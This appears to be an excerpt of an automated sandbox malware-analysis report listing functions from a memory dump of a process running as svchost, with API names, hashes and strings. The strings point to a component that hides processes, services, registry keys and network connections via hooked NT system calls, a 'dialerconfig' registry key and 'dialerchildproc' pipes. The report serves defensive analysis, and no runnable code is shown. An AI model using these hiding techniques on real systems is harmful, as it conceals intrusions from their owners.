                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: C761A172B41AA287DB988F1590807B97BD2F754BD4F588135DF6907788DB38ECA2C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                                • Instruction ID: 37f6b4a35d52c06492a2f816035ee87f2c0b4da3a164c87f2d500a2a78e06805
                                                                                • Opcode Fuzzy Hash: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                                • Instruction Fuzzy Hash: 9CF085703A1EC385FA64A7B258113F612C04B88BE0F0CA3F0ED2AC72C2DB3C84808620

                                                                                Control-flow Graph

                                                                                control_flow_graph (rendered graph with an Executed / Not Executed legend; block listing collapsed): 1f28c932b2c-1f28c932ba5 call 1f28c952ce0 -> GetModuleHandleA at 1f28c932bc9-1f28c932bd9 (fallback call 1f28c946090 at 1f28c932bdb) -> StrCmpNIW at 1f28c932c14-1f28c932c33 -> loop from 1f28c932c60 over calls to 1f28c93199c, 1f28c931bbc, lstrlenW (1f28c932d4b, 1f28c932e05), 1f28c93152c and 1f28c933844 -> up to three calls to 1f28c9385c0 at 1f28c932e63, 1f28c932e85 and 1f28c932eab -> exit 1f28c932ee0-1f28c932f03.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 5ddfa2ae8d86f9d74b9217bdca104cd19bacd61b75c306f4a54b144b8a2605f5
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: A3B16776250ED286EB698F35D4417F963E5FB44BC4F4860B6EE0997BA6EB35C880C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction ID: 315950f2970cd4e23eb0bb7edb8b7cf3ceedc3dc3316b9e43c8c6da18fa3bab3
• Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction Fuzzy Hash: C2313B72245FC19AEB609F60E8807FD73A5F784788F48446ADA4E57B98EF38C648C710
APIs
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
• Instruction ID: de600b675c99b63b07bfc61b3ea15e563d1fd6e5409b2fafadfe2c025ff4e9af
• Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
• Instruction Fuzzy Hash: B7316672254FC196EB608B25E8803FE73A4F789798F540166EA9D43BA8EF38C545CB00

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: c2eb12f427962f4a473e0d6cdd6568ad5d847194dadf60defaa1d10753933b52
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: A871D676250E92C6EB209F76E8906F923E4FB84BCDF046161DE4E57A69EF38C444C744

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction ID: 18f95a425c74309a6456fd4bbe7ec78cd519c13267e7c4c7f8ddd63764443e45
• Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction Fuzzy Hash: 8E512676244F85C6EB54CF62E5483BAB7E1F789BD9F048134DA4A07B68EF38C1498B00

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction ID: 9487c6cd3bd73dd193c882a9535ab93ec09423b9485fe8c9d985bb2c2d5cc9fb
• Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction Fuzzy Hash: A3318F79280ECBA1EA05EBB5EC616F463A4F7043C4F88A0F3E85953576AF388259C350

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
• API String ID: 190073905-1786718095
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700

Control-flow Graph
APIs
• GetLastError.KERNEL32 ref: 000001F28C93CE37
• FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
• SetLastError.KERNEL32 ref: 000001F28C93CED7
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
• FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
  • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
  • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
  • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
• Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510
• Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
• Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
• Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
• Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
• Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
APIs
• FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
• FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
• FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
• FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
• FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
Strings
Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 67fdd3f2f8992466b5831d267c2879e71773b428b435bf4b694825e767cf1671
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 69115B71250E82C6E7508B52E8547B966E0F788FE5F448264EA5E87794DB38C9148740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 9fd3b5cfc8d5e8966b9d3604d7804b60c4d561f4ad314e44b91f313a0dd5a99b
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: BB112A7A745B82C2EB149B22E4082B962A0F748BD5F4841B9DE8D07B54EF3DC545C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 47c5c9812b7ca215d1726492dddbe4c416650bb443fc8a163cb96cfe57a725b8
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: B7D17876248F8981DB709B1AE4943BA77E0F38CBC8F151166EA8D47BA9DF38C551CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: b9cea8a45f337747782123fe34ee0897264f1dc14d1d7790dfee48e93a4f475a
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: FF316C36781F96C2EA55DF26E9407BA67E0FB48BC4F089174DE4847B66EF38C4A18700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 418adbff46a5a50f38b0b253e874f0d0017697ca07832169e1c80a98fc2d9935
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: A8119D31394EC2C2FA24A73169557FA22D66B88BF4F1863B4E836477DAEF3984018600
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 1a6447b746ba72951b106e25e3206bcaab34f772bbf3986eefe84e7ef40a23b2
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 5A012D71344E8282EB64DB62A4587B963E5F788BC5F488075DE4983765DF3CC549C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: efc9dd88066c2b846a4813f200c66da5525754cb4ea5464905f9a4518e267477
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 690129B5291F82C2FB249B22E8183B963E0BB49BC6F0844B8CD4E07765EF3DC1488700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: f9eb285e1d34bcdb7ed76620ca0307c61ee7c6b0458fb15f7398ffc743cad808
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: A451DF32345A828AEB14CF65E848BB977E6F344BC8F1A91B4DE0653788DB75CA81C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: efef17bbaea8c09d0e74b7a2858e95e013f6fcdb200dc7db2845cff4b926692d
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 71F04F72344EC292EB608F21F8847B967A1F748BC9F889070DA4987964DF3CC68DCB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 148976000f075657713aaae28a70d927c58dd9bf1c24965bf8e6e3b71b7eca3c
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: CBF01275754FC682EA148B53B9141B966A6BB48FD0F08D1B4EE5A47B18DF3CC4458700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
